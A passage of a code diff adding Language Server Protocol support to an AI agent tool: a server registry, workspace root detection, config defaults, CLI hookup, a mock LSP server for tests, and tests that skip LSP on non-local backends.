+    bin_path = _resolve_override(ctx, "kotlin-language-server") or _which(
+        "kotlin-language-server"
+    )
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("kotlin-language-server", {}),
+        initialization_options=ctx.init_overrides.get("kotlin-language-server", {}),
+    )
+
+
+def _spawn_jdtls(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    # jdtls has a complex install flow.  We require a manual install
+    # for now and look for the wrapper script that the jdtls install
+    # produces.
+    bin_path = _resolve_override(ctx, "jdtls") or _which("jdtls")
+    if bin_path is None:
+        return None
+    return SpawnSpec(
+        command=[bin_path],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("jdtls", {}),
+        initialization_options=ctx.init_overrides.get("jdtls", {}),
+    )
+
+
+def _spawn_vue(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "vue-language-server") or _which(
+        "vue-language-server"
+    )
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("@vue/language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("vue-language-server", {}),
+        initialization_options=ctx.init_overrides.get("vue-language-server", {}),
+    )
+
+
+def _spawn_svelte(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "svelte-language-server") or _which(
+        "svelteserver", "svelte-language-server"
+    )
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("svelte-language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("svelte-language-server", {}),
+        initialization_options=ctx.init_overrides.get("svelte-language-server", {}),
+    )
+
+
+def _spawn_astro(root: str, ctx: ServerContext) -> Optional[SpawnSpec]:
+    bin_path = _resolve_override(ctx, "astro-language-server") or _which(
+        "astro-ls", "astro-language-server"
+    )
+    if bin_path is None:
+        from agent.lsp.install import try_install
+        bin_path = try_install("@astrojs/language-server", ctx.install_strategy)
+        if bin_path is None:
+            return None
+    return SpawnSpec(
+        command=[bin_path, "--stdio"],
+        workspace_root=root,
+        cwd=root,
+        env=ctx.env_overrides.get("astro-language-server", {}),
+        initialization_options=ctx.init_overrides.get("astro-language-server", {}),
+    )
+
+
+def _resolve_override(ctx: ServerContext, server_id: str) -> Optional[str]:
+    """User can pin a binary path in config."""
+    override = ctx.binary_overrides.get(server_id)
+    if override and override[0] and os.path.exists(override[0]):
+        return override[0]
+    return None
+
+
+# ---------------------------------------------------------------------------
+# root resolvers
+# ---------------------------------------------------------------------------
+
+
+def _root_python(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        ["pyproject.toml", "setup.py", "setup.cfg", "requirements.txt", "Pipfile", "pyrightconfig.json"],
+    )
+
+
+def _root_typescript(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        [
+            "package-lock.json",
+            "bun.lockb",
+            "bun.lock",
+            "pnpm-lock.yaml",
+            "yarn.lock",
+            "package.json",
+            "tsconfig.json",
+        ],
+        excludes=["deno.json", "deno.jsonc"],
+    )
+
+
+def _root_go(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        ["go.work", "go.mod", "go.sum"],
+    )
+
+
+def _root_rust(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["Cargo.toml", "Cargo.lock"])
+
+
+def _root_ruby(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["Gemfile"])
+
+
+def _root_clangd(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        ["compile_commands.json", "compile_flags.txt", ".clangd"],
+    )
+
+
+def _root_bash(file_path: str, workspace: str) -> str:
+    return workspace
+
+
+def _root_yaml(file_path: str, workspace: str) -> str:
+    return workspace
+
+
+def _root_lua(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        [".luarc.json", ".luarc.jsonc", ".luacheckrc", ".stylua.toml", "stylua.toml", "selene.toml", "selene.yml"],
+    )
+
+
+def _root_php(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["composer.json", "composer.lock", ".php-version"])
+
+
+def _root_ocaml(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["dune-project", "dune-workspace", ".merlin", "opam"])
+
+
+def _root_docker(file_path: str, workspace: str) -> str:
+    return workspace
+
+
+def _root_terraform(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, [".terraform.lock.hcl", "terraform.tfstate"])
+
+
+def _root_dart(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["pubspec.yaml", "analysis_options.yaml"])
+
+
+def _root_haskell(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["stack.yaml", "cabal.project", "hie.yaml"])
+
+
+def _root_julia(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["Project.toml", "Manifest.toml"])
+
+
+def _root_clojure(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path, workspace, ["deps.edn", "project.clj", "shadow-cljs.edn", "bb.edn", "build.boot"]
+    )
+
+
+def _root_nix(file_path: str, workspace: str) -> str:
+    found = nearest_root(file_path, ["flake.nix"])
+    return found or workspace
+
+
+def _root_zig(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["build.zig"])
+
+
+def _root_elixir(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(file_path, workspace, ["mix.exs", "mix.lock"])
+
+
+def _root_prisma(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path, workspace, ["schema.prisma", "prisma/schema.prisma"]
+    )
+
+
+def _root_kotlin(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        ["settings.gradle", "settings.gradle.kts", "build.gradle", "build.gradle.kts", "pom.xml"],
+    )
+
+
+def _root_java(file_path: str, workspace: str) -> Optional[str]:
+    return _root_or_workspace(
+        file_path,
+        workspace,
+        ["pom.xml", "build.gradle", "build.gradle.kts", ".project", ".classpath", "settings.gradle"],
+    )
+
+
+# ---------------------------------------------------------------------------
+# the registry
+# ---------------------------------------------------------------------------
+
+
+SERVERS: List[ServerDef] = [
+    ServerDef(
+        server_id="pyright",
+        extensions=(".py", ".pyi"),
+        resolve_root=_root_python,
+        build_spawn=_spawn_pyright,
+        description="Python — Microsoft pyright",
+    ),
+    ServerDef(
+        server_id="typescript",
+        extensions=(".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs", ".mts", ".cts"),
+        resolve_root=_root_typescript,
+        build_spawn=_spawn_typescript,
+        seed_first_push=True,
+        description="JavaScript/TypeScript — typescript-language-server",
+    ),
+    ServerDef(
+        server_id="vue-language-server",
+        extensions=(".vue",),
+        resolve_root=_root_typescript,
+        build_spawn=_spawn_vue,
+        description="Vue.js — @vue/language-server",
+    ),
+    ServerDef(
+        server_id="svelte-language-server",
+        extensions=(".svelte",),
+        resolve_root=_root_typescript,
+        build_spawn=_spawn_svelte,
+        description="Svelte — svelte-language-server",
+    ),
+    ServerDef(
+        server_id="astro-language-server",
+        extensions=(".astro",),
+        resolve_root=_root_typescript,
+        build_spawn=_spawn_astro,
+        description="Astro — @astrojs/language-server",
+    ),
+    ServerDef(
+        server_id="gopls",
+        extensions=(".go",),
+        resolve_root=_root_go,
+        build_spawn=_spawn_gopls,
+        description="Go — gopls",
+    ),
+    ServerDef(
+        server_id="rust-analyzer",
+        extensions=(".rs",),
+        resolve_root=_root_rust,
+        build_spawn=_spawn_rust_analyzer,
+        description="Rust — rust-analyzer",
+    ),
+    ServerDef(
+        server_id="clangd",
+        extensions=(".c", ".cpp", ".cc", ".cxx", ".h", ".hh", ".hpp", ".hxx"),
+        resolve_root=_root_clangd,
+        build_spawn=_spawn_clangd,
+        description="C/C++ — clangd",
+    ),
+    ServerDef(
+        server_id="bash-language-server",
+        extensions=(".sh", ".bash", ".zsh", ".ksh"),
+        resolve_root=_root_bash,
+        build_spawn=_spawn_bash_ls,
+        description="Bash — bash-language-server",
+    ),
+    ServerDef(
+        server_id="yaml-language-server",
+        extensions=(".yaml", ".yml"),
+        resolve_root=_root_yaml,
+        build_spawn=_spawn_yaml_ls,
+        description="YAML — yaml-language-server",
+    ),
+    ServerDef(
+        server_id="lua-language-server",
+        extensions=(".lua",),
+        resolve_root=_root_lua,
+        build_spawn=_spawn_lua_ls,
+        description="Lua — lua-language-server",
+    ),
+    ServerDef(
+        server_id="intelephense",
+        extensions=(".php",),
+        resolve_root=_root_php,
+        build_spawn=_spawn_intelephense,
+        description="PHP — intelephense",
+    ),
+    ServerDef(
+        server_id="ocaml-lsp",
+        extensions=(".ml", ".mli"),
+        resolve_root=_root_ocaml,
+        build_spawn=_spawn_ocamllsp,
+        description="OCaml — ocaml-lsp",
+    ),
+    ServerDef(
+        server_id="dockerfile-ls",
+        extensions=(".dockerfile", "Dockerfile"),
+        resolve_root=_root_docker,
+        build_spawn=_spawn_dockerfile_ls,
+        description="Dockerfile — dockerfile-language-server-nodejs",
+    ),
+    ServerDef(
+        server_id="terraform-ls",
+        extensions=(".tf", ".tfvars"),
+        resolve_root=_root_terraform,
+        build_spawn=_spawn_terraform_ls,
+        description="Terraform — terraform-ls",
+    ),
+    ServerDef(
+        server_id="dart",
+        extensions=(".dart",),
+        resolve_root=_root_dart,
+        build_spawn=_spawn_dart,
+        description="Dart — built-in language server",
+    ),
+    ServerDef(
+        server_id="haskell-language-server",
+        extensions=(".hs", ".lhs"),
+        resolve_root=_root_haskell,
+        build_spawn=_spawn_haskell_ls,
+        description="Haskell — haskell-language-server",
+    ),
+    ServerDef(
+        server_id="julia",
+        extensions=(".jl",),
+        resolve_root=_root_julia,
+        build_spawn=_spawn_julia,
+        description="Julia — LanguageServer.jl",
+    ),
+    ServerDef(
+        server_id="clojure-lsp",
+        extensions=(".clj", ".cljs", ".cljc", ".edn"),
+        resolve_root=_root_clojure,
+        build_spawn=_spawn_clojure_lsp,
+        description="Clojure — clojure-lsp",
+    ),
+    ServerDef(
+        server_id="nixd",
+        extensions=(".nix",),
+        resolve_root=_root_nix,
+        build_spawn=_spawn_nixd,
+        description="Nix — nixd",
+    ),
+    ServerDef(
+        server_id="zls",
+        extensions=(".zig", ".zon"),
+        resolve_root=_root_zig,
+        build_spawn=_spawn_zls,
+        description="Zig — zls",
+    ),
+    ServerDef(
+        server_id="gleam",
+        extensions=(".gleam",),
+        resolve_root=lambda fp, ws: _root_or_workspace(fp, ws, ["gleam.toml"]),
+        build_spawn=_spawn_gleam,
+        description="Gleam — built-in language server",
+    ),
+    ServerDef(
+        server_id="elixir-ls",
+        extensions=(".ex", ".exs"),
+        resolve_root=_root_elixir,
+        build_spawn=_spawn_elixir_ls,
+        description="Elixir — elixir-ls",
+    ),
+    ServerDef(
+        server_id="prisma",
+        extensions=(".prisma",),
+        resolve_root=_root_prisma,
+        build_spawn=_spawn_prisma,
+        description="Prisma — built-in language server",
+    ),
+    ServerDef(
+        server_id="kotlin-language-server",
+        extensions=(".kt", ".kts"),
+        resolve_root=_root_kotlin,
+        build_spawn=_spawn_kotlin_ls,
+        description="Kotlin — kotlin-language-server",
+    ),
+    ServerDef(
+        server_id="jdtls",
+        extensions=(".java",),
+        resolve_root=_root_java,
+        build_spawn=_spawn_jdtls,
+        description="Java — Eclipse JDT Language Server",
+    ),
+]
+
+
+def find_server_for_file(file_path: str) -> Optional[ServerDef]:
+    """Return the registry entry that handles ``file_path``, or None."""
+    for srv in SERVERS:
+        if srv.matches(file_path):
+            return srv
+    return None
+
+
+def language_id_for(path: str) -> str:
+    """Return the LSP languageId to send in didOpen for ``path``."""
+    ext = _file_ext_or_basename(path)
+    return LANGUAGE_BY_EXT.get(ext, "plaintext")
+
+
+__all__ = [
+    "ServerDef",
+    "ServerContext",
+    "SpawnSpec",
+    "SERVERS",
+    "find_server_for_file",
+    "language_id_for",
+    "LANGUAGE_BY_EXT",
+]
diff --git a/agent/lsp/workspace.py b/agent/lsp/workspace.py
new file mode 100644
index 00000000000..4f5beacfbbe
--- /dev/null
+++ b/agent/lsp/workspace.py
@@ -0,0 +1,223 @@
+"""Workspace and project-root resolution for LSP.
+
+Two concerns live here:
+
+1. **Workspace gate** — the upper-level "is this directory a project?"
+   check.  Hermes only runs LSP when the cwd (or the file being edited)
+   sits inside a git worktree.  Files outside any git root never
+   trigger LSP, even if a server is configured.  This keeps Telegram
+   gateway users on user-home cwd's from spawning daemons.
+
+2. **NearestRoot** — the per-server project-root walk.  Each language
+   server cares about a different marker (``pyproject.toml`` for
+   Python, ``Cargo.toml`` for Rust, ``go.mod`` for Go, etc.) and
+   wants the directory containing that marker.  ``nearest_root()``
+   walks up from a starting path looking for any of a list of marker
+   files, optionally bailing if an exclude marker shows up first.
+"""
+from __future__ import annotations
+
+import logging
+import os
+from pathlib import Path
+from typing import Iterable, Optional, Tuple
+
+logger = logging.getLogger("agent.lsp.workspace")
+
+# Cache: cwd → (worktree_root, is_git) so repeated calls don't re-stat.
+# Cleared on shutdown.  Keyed by absolute resolved path so symlink
+# folds collapse to one entry.
+_workspace_cache: dict = {}
+
+
+def normalize_path(path: str) -> str:
+    """Normalize a path for use as a stable map key.
+
+    Resolves ``~``, makes absolute, and collapses ``.``/``..``.  We do
+    NOT resolve symlinks here — symlink stability matters for some
+    LSP servers (rust-analyzer cares about Cargo workspace identity)
+    and we want the canonical path the user typed when possible.
+    """
+    return os.path.abspath(os.path.expanduser(path))
+
+
+def find_git_worktree(start: str) -> Optional[str]:
+    """Walk up from ``start`` looking for a ``.git`` entry (file or dir).
+
+    Returns the directory containing ``.git``, or ``None`` if no git
+    root is found before hitting the filesystem root.
+
+    A ``.git`` *file* (not directory) means we're inside a git
+    worktree set up via ``git worktree add`` — both forms count.
+    """
+    try:
+        start_path = Path(normalize_path(start))
+        if start_path.is_file():
+            start_path = start_path.parent
+    except (OSError, RuntimeError, ValueError):
+        # Pathological input (loop in symlinks, encoding error, etc.) —
+        # bail out rather than crash the lint hook.
+        return None
+
+    # Cache check
+    cached = _workspace_cache.get(str(start_path))
+    if cached is not None:
+        root, _is_git = cached
+        return root
+
+    cur = start_path
+    # Defensive cap: the deepest reasonable monorepo is well under 64
+    # levels.  Caps the walk so a pathological cwd or a symlink cycle
+    # we somehow traverse can't keep us looping.
+    for _ in range(64):
+        git_marker = cur / ".git"
+        try:
+            if git_marker.exists():
+                resolved = str(cur)
+                _workspace_cache[str(start_path)] = (resolved, True)
+                return resolved
+        except OSError:
+            # Permission error on a parent dir — bail out cleanly.
+            break
+        parent = cur.parent
+        if parent == cur:
+            break
+        cur = parent
+
+    _workspace_cache[str(start_path)] = (None, False)
+    return None
+
+
+def is_inside_workspace(path: str, workspace_root: str) -> bool:
+    """Return True iff ``path`` is inside (or equal to) ``workspace_root``.
+
+    Uses absolute paths but does not resolve symlinks — a file accessed
+    via a symlink that points outside the workspace still counts as
+    outside.  This is the conservative interpretation; matches LSP
+    behaviour where servers reject didOpen for unrelated files.
+    """
+    p = normalize_path(path)
+    root = normalize_path(workspace_root)
+    if p == root:
+        return True
+    # Use os.path.commonpath to handle case-insensitive filesystems
+    # correctly on macOS/Windows.
+    try:
+        common = os.path.commonpath([p, root])
+    except ValueError:
+        # Different drives on Windows.
+        return False
+    return common == root
+
+
+def nearest_root(
+    start: str,
+    markers: Iterable[str],
+    *,
+    excludes: Optional[Iterable[str]] = None,
+    ceiling: Optional[str] = None,
+) -> Optional[str]:
+    """Walk up from ``start`` looking for any of the given marker files.
+
+    Returns the **directory containing** the first matched marker, or
+    ``None`` if no marker is found before hitting ``ceiling`` (or the
+    filesystem root if no ceiling).
+
+    If ``excludes`` is provided and an exclude marker matches *first*
+    in the upward walk, returns ``None`` — the server is gated off
+    for that file.  Mirrors OpenCode's NearestRoot exclude semantics
+    (e.g. typescript skips deno projects when ``deno.json`` is found
+    before ``package.json``).
+    """
+    start_path = Path(normalize_path(start))
+    try:
+        if start_path.is_file():
+            start_path = start_path.parent
+    except (OSError, RuntimeError, ValueError):
+        return None
+    ceiling_path = Path(normalize_path(ceiling)) if ceiling else None
+
+    markers_list = list(markers)
+    excludes_list = list(excludes) if excludes else []
+
+    cur = start_path
+    # Defensive cap matching ``find_git_worktree``.  Bounded walk
+    # protects against pathological inputs even though the
+    # parent-equality stop normally terminates within ~10 steps.
+    for _ in range(64):
+        # Check excludes first — if an exclude is found at this level,
+        # the server is gated off for this file.
+        for exc in excludes_list:
+            try:
+                if (cur / exc).exists():
+                    return None
+            except OSError:
+                continue
+        # Then check markers.
+        for marker in markers_list:
+            try:
+                if (cur / marker).exists():
+                    return str(cur)
+            except OSError:
+                continue
+        # Stop conditions.
+        if ceiling_path is not None and cur == ceiling_path:
+            return None
+        parent = cur.parent
+        if parent == cur:
+            return None
+        cur = parent
+    return None
+
+
+def resolve_workspace_for_file(
+    file_path: str,
+    *,
+    cwd: Optional[str] = None,
+) -> Tuple[Optional[str], bool]:
+    """Resolve the workspace root for a file.
+
+    Returns ``(workspace_root, gated_in)`` where ``gated_in`` is True
+    iff LSP should run for this file at all.  Currently the gate is
+    "file is inside a git worktree found by walking up from cwd OR
+    from the file itself".
+
+    The cwd path takes precedence — if the agent was launched in a
+    git project, that worktree is the workspace, and any edit inside
+    it (regardless of where the file lives) is in-scope.  If the cwd
+    isn't in a git worktree, we try the file's own location as a
+    fallback.
+
+    Returns ``(None, False)`` when neither path is in a git worktree.
+    """
+    cwd = cwd or os.getcwd()
+    cwd_root = find_git_worktree(cwd)
+    if cwd_root is not None:
+        if is_inside_workspace(file_path, cwd_root):
+            return cwd_root, True
+        # File is outside the cwd's worktree — try the file's own
+        # location as a secondary anchor.  Useful for monorepos where
+        # the user opens an unrelated checkout.
+    file_root = find_git_worktree(file_path)
+    if file_root is not None:
+        return file_root, True
+    return None, False
+
+
+def clear_cache() -> None:
+    """Clear the workspace-resolution cache.
+
+    Called on service shutdown so a subsequent re-init doesn't pick
+    up stale results from a previous session.
+    """
+    _workspace_cache.clear()
+
+
+__all__ = [
+    "find_git_worktree",
+    "is_inside_workspace",
+    "nearest_root",
+    "normalize_path",
+    "resolve_workspace_for_file",
+    "clear_cache",
+]
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 6b981824279..038aca518fb 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -1499,6 +1499,53 @@ DEFAULT_CONFIG = {
         "backup_keep": 5,
     },
 
+    # Language Server Protocol — semantic diagnostics from real
+    # language servers (pyright, gopls, rust-analyzer, etc.) wired
+    # into the post-write lint check used by ``write_file`` and
+    # ``patch``.
+    #
+    # LSP is gated on git-workspace detection: when the agent's
+    # cwd (or the file being edited) is inside a git worktree, LSP
+    # runs against that workspace.  When neither is in a git repo,
+    # LSP stays dormant and the in-process syntax check is the only
+    # tier — handy for Telegram/Discord chats where the cwd is the
+    # user's home directory.
+    "lsp": {
+        # Master toggle.  Setting this to false disables the entire
+        # subsystem — no servers spawn, no background event loop, no
+        # cost.
+        "enabled": True,
+
+        # Diagnostic-wait mode for the post-write check.
+        # ``"document"`` waits up to ``wait_timeout`` seconds for the
+        # current file's diagnostics; ``"full"`` additionally requests
+        # workspace-wide diagnostics (slower).
+        "wait_mode": "document",
+        "wait_timeout": 5.0,
+
+        # How to handle missing server binaries.
+        # ``"auto"`` — try to install via npm/go/pip into
+        #              ``<HERMES_HOME>/lsp/bin/`` on first use.
+        # ``"manual"`` — only use binaries already on PATH.
+        # ``"off"`` — alias for ``manual``.
+        "install_strategy": "auto",
+
+        # Per-server overrides.  Each key is a server_id from the
+        # registry (``pyright``, ``typescript``, ``gopls``,
+        # ``rust-analyzer``, etc.) and accepts:
+        #   disabled: true
+        #     — skip this server even when its extensions match
+        #   command: ["full/path/to/server", "--stdio"]
+        #     — pin a custom binary path; bypasses auto-install
+        #   env: {"KEY": "value"}
+        #     — extra env vars passed to the spawned process
+        #   initialization_options: {...}
+        #     — merged into the LSP ``initializationOptions``
+        # Empty by default; the registry defaults work for typical
+        # setups.
+        "servers": {},
+    },
+
     # Config schema version - bump this when adding new required fields
     "_config_version": 23,
 }
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 7a30a57ca77..c40158b761b 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -9533,6 +9533,17 @@ def main():
 
     gateway_parser.set_defaults(func=cmd_gateway)
 
+    # =========================================================================
+    # lsp command
+    # =========================================================================
+    try:
+        from agent.lsp.cli import register_subparser as _lsp_register
+        _lsp_register(subparsers)
+    except Exception as _lsp_err:  # noqa: BLE001
+        # LSP is optional infrastructure — never let a registration
+        # failure break the CLI overall.
+        logger.debug("LSP CLI registration failed: %s", _lsp_err)
+
     # =========================================================================
     # setup command
     # =========================================================================
diff --git a/tests/agent/lsp/__init__.py b/tests/agent/lsp/__init__.py
new file mode 100644
index 00000000000..71a58eff250
--- /dev/null
+++ b/tests/agent/lsp/__init__.py
@@ -0,0 +1 @@
+"""Pytest helpers for LSP-related tests."""
diff --git a/tests/agent/lsp/_mock_lsp_server.py b/tests/agent/lsp/_mock_lsp_server.py
new file mode 100644
index 00000000000..0220fec195d
--- /dev/null
+++ b/tests/agent/lsp/_mock_lsp_server.py
@@ -0,0 +1,159 @@
+#!/usr/bin/env python3
+"""A minimal in-process LSP server used by tests.
+
+Speaks just enough LSP to drive :class:`agent.lsp.client.LSPClient`
+through a full lifecycle: ``initialize``, ``initialized``,
+``textDocument/didOpen``, ``textDocument/didChange``, then a
+``textDocument/publishDiagnostics`` notification followed by
+``shutdown`` + ``exit``.
+
+Behaviour (all behaviours selectable via env var ``MOCK_LSP_SCRIPT``):
+
+- ``"clean"`` — initialize, accept didOpen/didChange, push empty
+  diagnostics on every open/change, exit cleanly on shutdown.
+- ``"errors"`` — same as ``clean`` but the published diagnostics
+  carry one severity-1 entry pointing at line 0:0.
+- ``"crash"`` — exit immediately after responding to ``initialize``
+  (simulates a crashing server).
+- ``"slow"`` — same as ``clean`` but sleeps 1s before responding to
+  ``initialize`` (lets us test timeout behaviour).
+
+The script writes JSON-RPC framed messages to stdout and reads from
+stdin.  No third-party dependencies — uses only stdlib so it runs
+under whatever Python the test process picks up.
+"""
+from __future__ import annotations
+
+import json
+import os
+import sys
+import time
+
+
+def read_message():
+    """Read one Content-Length framed JSON-RPC message from stdin."""
+    headers = {}
+    while True:
+        line = sys.stdin.buffer.readline()
+        if not line:
+            return None
+        line = line.rstrip(b"\r\n")
+        if not line:
+            break
+        k, _, v = line.decode("ascii").partition(":")
+        headers[k.strip().lower()] = v.strip()
+    n = int(headers["content-length"])
+    body = sys.stdin.buffer.read(n)
+    return json.loads(body.decode("utf-8"))
+
+
+def write_message(obj):
+    body = json.dumps(obj, separators=(",", ":")).encode("utf-8")
+    sys.stdout.buffer.write(f"Content-Length: {len(body)}\r\n\r\n".encode("ascii"))
+    sys.stdout.buffer.write(body)
+    sys.stdout.buffer.flush()
+
+
+def main():
+    script = os.environ.get("MOCK_LSP_SCRIPT", "clean")
+
+    while True:
+        msg = read_message()
+        if msg is None:
+            return 0
+
+        if "id" in msg and msg.get("method") == "initialize":
+            if script == "slow":
+                time.sleep(1.0)
+            write_message(
+                {
+                    "jsonrpc": "2.0",
+                    "id": msg["id"],
+                    "result": {
+                        "capabilities": {
+                            "textDocumentSync": 1,  # Full
+                            "diagnosticProvider": {"interFileDependencies": False, "workspaceDiagnostics": False},
+                        },
+                        "serverInfo": {"name": "mock-lsp", "version": "0.1"},
+                    },
+                }
+            )
+            if script == "crash":
+                return 0
+            continue
+
+        if msg.get("method") == "initialized":
+            continue
+
+        if msg.get("method") == "workspace/didChangeConfiguration":
+            continue
+
+        if msg.get("method") == "workspace/didChangeWatchedFiles":
+            continue
+
+        if msg.get("method") in ("textDocument/didOpen", "textDocument/didChange"):
+            params = msg.get("params") or {}
+            td = params.get("textDocument") or {}
+            uri = td.get("uri", "")
+            version = td.get("version", 0)
+            diagnostics = []
+            if script == "errors":
+                diagnostics = [
+                    {
+                        "range": {
+                            "start": {"line": 0, "character": 0},
+                            "end": {"line": 0, "character": 5},
+                        },
+                        "severity": 1,
+                        "code": "MOCK001",
+                        "source": "mock-lsp",
+                        "message": "synthetic error from mock-lsp",
+                    }
+                ]
+            write_message(
+                {
+                    "jsonrpc": "2.0",
+                    "method": "textDocument/publishDiagnostics",
+                    "params": {
+                        "uri": uri,
+                        "version": version,
+                        "diagnostics": diagnostics,
+                    },
+                }
+            )
+            continue
+
+        if msg.get("method") == "textDocument/diagnostic":
+            # Pull endpoint — return empty.
+            write_message(
+                {
+                    "jsonrpc": "2.0",
+                    "id": msg["id"],
+                    "result": {"kind": "full", "items": []},
+                }
+            )
+            continue
+
+        if msg.get("method") == "textDocument/didSave":
+            continue
+
+        if msg.get("method") == "shutdown":
+            write_message({"jsonrpc": "2.0", "id": msg["id"], "result": None})
+            continue
+
+        if msg.get("method") == "exit":
+            return 0
+
+        # Unknown request: respond with method-not-found.
+        if "id" in msg:
+            write_message(
+                {
+                    "jsonrpc": "2.0",
+                    "id": msg["id"],
+                    "error": {"code": -32601, "message": f"method not found: {msg.get('method')}"},
+                }
+            )
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/tests/agent/lsp/test_backend_gate.py b/tests/agent/lsp/test_backend_gate.py
new file mode 100644
index 00000000000..3c0df8702ea
--- /dev/null
+++ b/tests/agent/lsp/test_backend_gate.py
@@ -0,0 +1,108 @@
+"""Integration test: LSP layer is skipped on non-local backends.
+
+The host-side LSP server can't see files inside a Docker/Modal/SSH
+sandbox.  When the agent's terminal env isn't ``LocalEnvironment``,
+the file_operations layer must skip both ``snapshot_baseline`` and
+``get_diagnostics_sync`` calls — falling back to the in-process
+syntax check exactly as if LSP were disabled.
+"""
+from __future__ import annotations
+
+import os
+import sys
+from unittest.mock import MagicMock
+
+import pytest
+
+from agent.lsp import eventlog
+
+
+@pytest.fixture(autouse=True)
+def _reset():
+    eventlog.reset_announce_caches()
+
+
+def test_local_only_helper_returns_true_for_local_env():
+    from tools.environments.local import LocalEnvironment
+    from tools.file_operations import ShellFileOperations
+
+    fops = ShellFileOperations(LocalEnvironment(cwd="/tmp"))
+    assert fops._lsp_local_only() is True
+
+
+def test_local_only_helper_returns_false_for_non_local_env():
+    """A mocked non-local env (Docker/Modal/SSH stand-in) returns False."""
+    from tools.file_operations import ShellFileOperations
+
+    # Build something that's NOT a LocalEnvironment.  We use a bare
+    # MagicMock — isinstance() against LocalEnvironment is False.
+    fake_env = MagicMock()
+    fake_env.execute = MagicMock(return_value=MagicMock(exit_code=0, stdout=""))
+    fake_env.cwd = "/sandbox"
+    fops = ShellFileOperations(fake_env)
+    assert fops._lsp_local_only() is False
+
+
+def test_snapshot_baseline_skipped_for_non_local(monkeypatch):
+    """Verify the LSP service's snapshot_baseline is NOT called when
+    the backend isn't local."""
+    from tools.file_operations import ShellFileOperations
+
+    fake_env = MagicMock()
+    fake_env.execute = MagicMock(return_value=MagicMock(exit_code=0, stdout=""))
+    fake_env.cwd = "/sandbox"
+    fops = ShellFileOperations(fake_env)
+
+    snapshot_called = []
+
+    class FakeService:
+        def snapshot_baseline(self, path):
+            snapshot_called.append(path)
+
+    monkeypatch.setattr("agent.lsp.get_service", lambda: FakeService())
+
+    fops._snapshot_lsp_baseline("/sandbox/x.py")
+    assert snapshot_called == [], "snapshot must be skipped for non-local backends"
+
+
+def test_maybe_lsp_diagnostics_returns_empty_for_non_local(monkeypatch):
+    from tools.file_operations import ShellFileOperations
+
+    fake_env = MagicMock()
+    fake_env.execute = MagicMock(return_value=MagicMock(exit_code=0, stdout=""))
+    fake_env.cwd = "/sandbox"
+    fops = ShellFileOperations(fake_env)
+
+    called = []
+
+    class FakeService:
+        def enabled_for(self, path):
+            called.append(("enabled_for", path))
+            return True
+        def get_diagnostics_sync(self, path, **kw):
+            called.append(("get_diagnostics_sync", path))
+            return [{"severity": 1, "message": "should not see this"}]
+
+    monkeypatch.setattr("agent.lsp.get_service", lambda: FakeService())
+
+    result = fops._maybe_lsp_diagnostics("/sandbox/x.py")
+    assert result == ""
+    assert called == [], "service must not be queried for non-local backends"
+
+
+def test_snapshot_baseline_called_for_local_env(tmp_path, monkeypatch):
+    from tools.environments.local import LocalEnvironment
+    from tools.file_operations import ShellFileOperations
+
+    fops = ShellFileOperations(LocalEnvironment(cwd=str(tmp_path)))
+
+    snapshot_called = []
+
+    class FakeService:
+        def snapshot_baseline(self, path):
+            snapshot_called.append(path)
+
+    monkeypatch.setattr("agent.lsp.get_service", lambda: FakeService())
+
+    fops._snapshot_lsp_baseline(str(tmp_path / "x.py"))
+    assert snapshot_called == [str(tmp_path / "x.py")]
diff --git a/tests/agent/lsp/test_broken_set.py b/tests/agent/lsp/test_broken_set.py
new file mode 100644
index 00000000000..c854bdc3861
--- /dev/null
+++ b/tests/agent/lsp/test_broken_set.py
@@ -0,0 +1,213 @@
+"""Tests for the broken-set short-circuit added to handle outer-timeout failures.
+
+When ``snapshot_baseline`` or ``get_diagnostics_sync`` time out from the
+service layer (because a language server hangs during initialize, or
